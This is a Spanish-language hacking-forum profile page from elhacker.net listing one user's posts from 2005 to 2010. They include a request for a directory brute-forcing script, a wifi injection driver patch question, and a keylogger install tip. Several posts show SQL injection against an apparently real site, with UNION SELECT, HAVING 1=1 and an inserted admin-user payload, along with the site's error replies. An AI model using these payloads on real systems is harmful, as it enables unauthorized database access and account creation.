Ando buscando algun script que brutee una lista común de directorios, onda:
www.host.com/includes
/admin
/shop
y así...
Alguien tiene algo similar?
www.host.com/includes
/admin
/shop
y así...
Alguien tiene algo similar?
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#42
GNU/Linux / No puedo parchear los drivers para capturar trafico
27 Mayo 2010, 20:10 PM
Buenas, estoy tratando de parchear mis drivers wifi (Broadcom BCM4312 802.11 Wireless controller 5.10.91.9 de una notebook Dell vostro 1510) para poder poner a la placa en modo monitor en Ubuntu.
Pero tengo el siguiente error:
root@laptop:/usr/src/linux-headers-2.6.31-16# patch -p1 -i bcm43xx-injection-linux-2.6.20.patch
can't find file to patch at input line 4
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:
--------------------------
|diff -ur linux/drivers/net/wireless/bcm43xx/bcm43xx_main.c linux-bcm43xx-patch2/drivers/net/wireless/bcm43xx/bcm43xx_main.c
|--- linux/drivers/net/wireless/bcm43xx/bcm43xx_main.c 2007-02-04 19:44:54.000000000 +0100
|+++ linux-bcm43xx-patch2/drivers/net/wireless/bcm43xx/bcm43xx_main.c 2008-03-01 16:20:39.000000000 +0100
--------------------------
File to patch:
----------------------------------------------------------------------------------------------------------
Que hago?? No estoy seguro de cual es el archivo exacto que tengo que parchear.
PD: Nunca instale los drivers de la placa, simplemente instale ubuntu y salio andando internet.
Pero tengo el siguiente error:
root@laptop:/usr/src/linux-headers-2.6.31-16# patch -p1 -i bcm43xx-injection-linux-2.6.20.patch
can't find file to patch at input line 4
Perhaps you used the wrong -p or --strip option?
The text leading up to this was:
--------------------------
|diff -ur linux/drivers/net/wireless/bcm43xx/bcm43xx_main.c linux-bcm43xx-patch2/drivers/net/wireless/bcm43xx/bcm43xx_main.c
|--- linux/drivers/net/wireless/bcm43xx/bcm43xx_main.c 2007-02-04 19:44:54.000000000 +0100
|+++ linux-bcm43xx-patch2/drivers/net/wireless/bcm43xx/bcm43xx_main.c 2008-03-01 16:20:39.000000000 +0100
--------------------------
File to patch:
----------------------------------------------------------------------------------------------------------
Que hago?? No estoy seguro de cual es el archivo exacto que tengo que parchear.
PD: Nunca instale los drivers de la placa, simplemente instale ubuntu y salio andando internet.
#43
Nivel Web / Re: [Duda] Sql Injeccion
23 Noviembre 2008, 00:55 AM
Como hacen para mandar ese tipo de inyecciones?
Yo estoy acostumbrado a usar los tipicos campos de la pagina o en la url :S
Yo estoy acostumbrado a usar los tipicos campos de la pagina o en la url :S
#44
Nivel Web / Re: SQL:Esta filtrando having o que !!!
23 Julio 2005, 01:33 AM
Gracias por tu respuesta 
ahora tengo q aprender a usar el putty. 
EDIT: no encuentro un manual
ahora tengo q aprender a usar el putty. EDIT: no encuentro un manual
#45
Nivel Web / SQL:Esta filtrando having o que !!!
15 Julio 2005, 05:22 AM
hola al injectar 'having 1=1-- por medio de netcat me encuentro con el siguiente error
esto lo hago para comenzar a sacar los campos de la tabla encodeado seria
una cosa mas que no estoy seguro es que al injectar por netcat tengo q cambiar el content-length que no lo manejo muy bien
CitarError de sintaxis falta operador en la expresion de consulta '1=1--' and clave = 'vcore''
esto lo hago para comenzar a sacar los campos de la tabla encodeado seria
Código [Seleccionar]
%27%20having%201%3D1-- tambien probe reemplazando %20 por + aunque no creo que tenga mucho que ver una cosa mas que no estoy seguro es que al injectar por netcat tengo q cambiar el content-length que no lo manejo muy bien
#46
Nivel Web / Re: SQL Injeccion- Pregunta
29 Junio 2005, 01:39 AM
estoy bajando el pdf a ver que tal
una cosilla antes creo que me eh podido crear un usuario no estoy seguro ya que cuando lo creo no manda ningun error de sql y cuando me logueo me responde
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
Bue me voy a leer
una cosilla antes creo que me eh podido crear un usuario no estoy seguro ya que cuando lo creo no manda ningun error de sql y cuando me logueo me responde
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
Bue me voy a leer
#47
Nivel Web / Re: SQL Injeccion- Pregunta
28 Junio 2005, 02:19 AM
no le hagas caso a eso de 0xffff la verdad que no se porque lo puse ???
Me podrias aclarar lo del query porque lo unico que se es que query es una consulta
Me podrias aclarar lo del query porque lo unico que se es que query es una consulta
#48
Nivel Web / Re: SQL Injeccion- Pregunta
25 Junio 2005, 21:02 PM
mira por lo que yo vi y entiendo el nombre de la tabla se llama LOGIN ,que la saque con ' Having 1=1--
y campos solo tiene dos Store_ID y Password
y luegon probando
me dio como resultado:
Y despues lo hice con el otro asique sino me equivoco varchar significaba que podian ser numeros o letras
EDIT:
El error que me da al tratar de agregar un usuario es :
RE-EDIT
: cuando puse '; insert into Login values (vcore, pass, 0xffff)--
(osea lo mismo pero sin comillas)
dio como resultado:
y campos solo tiene dos Store_ID y Password
y luegon probando
Código [Seleccionar]
' UNION SELECT SUM(Store_ID) FROM Login--me dio como resultado:
Código [Seleccionar]
The sum or average aggregate operation cannot take a varchar data type as an argument.Y despues lo hice con el otro asique sino me equivoco varchar significaba que podian ser numeros o letras
EDIT:
El error que me da al tratar de agregar un usuario es :
Código [Seleccionar]
Insert Error: Column name or number of supplied values does not match table definition.RE-EDIT
: cuando puse '; insert into Login values (vcore, pass, 0xffff)--(osea lo mismo pero sin comillas)
dio como resultado:
Código [Seleccionar]
The name 'vcore' is not permitted in this context. Only constants, expressions, or variables allowed here. Column names are not permitted.
#49
Nivel Web / SQL Injeccion- Pregunta
25 Junio 2005, 18:19 PM
Hola yo tengo las siguientes tablas
' GROUP BY Login.Store_ID, Login.Password HAVING 1=1--
y eh intentado dos cosas primero
Para sacar el usuario admin y luego con otra sentencia su password, pero no ha funcionado.
Y luego lo que se me ocurrio fue agregar un usuario a la tabla
pero me da el siguiente error
Incorrect syntax near '; insert into Login values ('.
' GROUP BY Login.Store_ID, Login.Password HAVING 1=1--
y eh intentado dos cosas primero
Código [Seleccionar]
' UNION SELECT MIN(Store_ID),1,1 FROM Login WHERE Store_ID > 'a'--Para sacar el usuario admin y luego con otra sentencia su password, pero no ha funcionado.
Y luego lo que se me ocurrio fue agregar un usuario a la tabla
Código [Seleccionar]
'; insert into Login values ('vcore', 'pass', 0xffff)--pero me da el siguiente error
Incorrect syntax near '; insert into Login values ('.
#50
Tutoriales - Documentación / Re: manual del perfect keylogger 1.5 indetectable a norton...
21 Marzo 2005, 09:21 AM
el error que tira muchas veces en las instalaciones es porque dice c:\program files\ y ustedes tendrian que poner \archivos de programas \
\